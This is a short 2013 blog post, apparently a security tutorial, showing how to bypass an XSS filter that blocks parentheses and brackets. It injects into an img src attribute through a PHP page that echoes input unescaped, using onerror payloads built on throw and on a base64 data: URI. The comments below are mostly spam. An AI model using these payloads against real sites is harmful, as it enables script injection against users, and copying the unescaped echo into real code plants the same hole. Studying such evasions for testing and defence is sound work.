Saturday, July 6, 2013

XSS parentheses and brackets filter bypassing

Let's assume that injection takes place in img tag src attribute:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="<?php echo $_GET['filename']"; ?> >
...
One approach is to use exceptions as is described here. So the injected code (filename param) should look like this: 
fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="
Resulting in: 
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="" >
...
But I'd like to show you another way to do XSS without parentheses and brackets by using location.href and "data:" URI with base64 encoding. Let's inject <script>alert("XSS")<script/> code (in base64 is PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=). So crafted parameter should look like this: 
fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="
Resulting in: 
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="" >
...
Posted by at
Labels: ,

6 comments:

  1. AnonymousJune 30, 2015 at 3:01 PM

    nice ;)

    ReplyDelete
  2. AnonymousNovember 20, 2015 at 9:19 AM

    Any reason why you use location.href , any other DOMs can be used?

    ReplyDelete
  3. Muhammad HassanAugust 16, 2019 at 2:47 PM

    Excellent to be visiting your blog again, it has been months for me. Rightly, this article that I've been served for therefore long. I want this article to finish my assignment within the faculty, and it has the same topic together with your article. Thanks for the ton of valuable help, nice share. https://aquafiltermag.com/

    ReplyDelete
  4. Kashif 0neJanuary 1, 2022 at 5:38 PM

    I admire this article for the well-researched content and excellent wording. I got so involved in this material that I couldn’t stop reading. I am impressed with your work and skill. Thank you so much. Check it out

    ReplyDelete
  5. AnonymousOctober 25, 2022 at 7:12 AM

    Mactan Island 근처에 위치해 있는 이 숙소에는 정원 내려다 보이는 48개의 객실이 있습니다. Moalboal Public Market 근처에 위치해 있는 이 숙소에는 대양 내려다 보이는 26개의 객실이 있습니다. LCT Star II 근처에 위치해 있는 이 숙소에는 바다 내려다 보이는 54개의 객실이 있습니다.

    ReplyDelete
  6. pg slotMarch 19, 2024 at 6:35 AM

    PG88 เว็บตรงสล็อตออนไลน์ PG SLOT สล็อตออนไลน์ได้กลายเป็นทางเลือกที่ยิ่งใหญ่และน่าสนใจสำหรับนักพนันในยุคปัจจุบัน PG การเล่นสล็อตผ่านทางอินเทอร์เน็ตนั้นสะดวกสบายและเข้าถึงได้ทุกที่ทุกเวลา

    ReplyDelete

Subscribe to: Post Comments (Atom)